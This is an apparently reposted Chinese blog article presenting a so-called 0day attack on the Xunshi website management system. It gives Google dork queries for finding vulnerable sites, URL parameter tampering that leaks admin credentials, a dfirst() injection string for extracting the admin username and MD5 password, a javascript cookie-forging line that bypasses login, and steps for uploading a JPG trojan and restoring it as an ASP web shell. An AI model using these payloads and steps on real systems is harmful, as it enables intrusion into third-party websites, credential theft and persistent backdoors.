讯时网站管理系统通杀0DAY漏洞
???? 首先聲明這方法不是我原創,我是從網上學習來的,由自己的語言重新編譯一下的。
???? 在谷歌搜索 inurl: admin/admin_news_pl_view.asp??? 打開搜索到的網址或者輸入 inurl:news_more.asp?lm2=
???? 然后修改成 admin/admin_news_pl_view.asp?id=1 或者 admin/admin_news_pl_view.asp?id=2 或者 admin/admin_news_pl_view.asp?id=3
??? 只要顯示錯誤就一直打3,4,5......
??? 找到管理員和32位MDB密碼后破解MDB密碼,然后進后臺? admin/admin_index.asp 輸入破解好的用戶名和密碼直接進系統
另外還可以這樣子進后臺:
|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='???????????? // 得到管理員用戶和MD5密碼
cookies進后臺
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
?在系統里面有上傳圖片的功能,上傳后,再用備份恢復數據庫的功能來恢復上傳好的JPG木馬成 ASP格式,搞定。
轉載于:https://www.cnblogs.com/swane/articles/3540137.html
總結
以上是生活随笔為你收集整理的讯时网站管理系统通杀0DAY漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 小程序地理位置接口wx.getLocat
- 下一篇: 因为计算机丢失user32.dll,Wi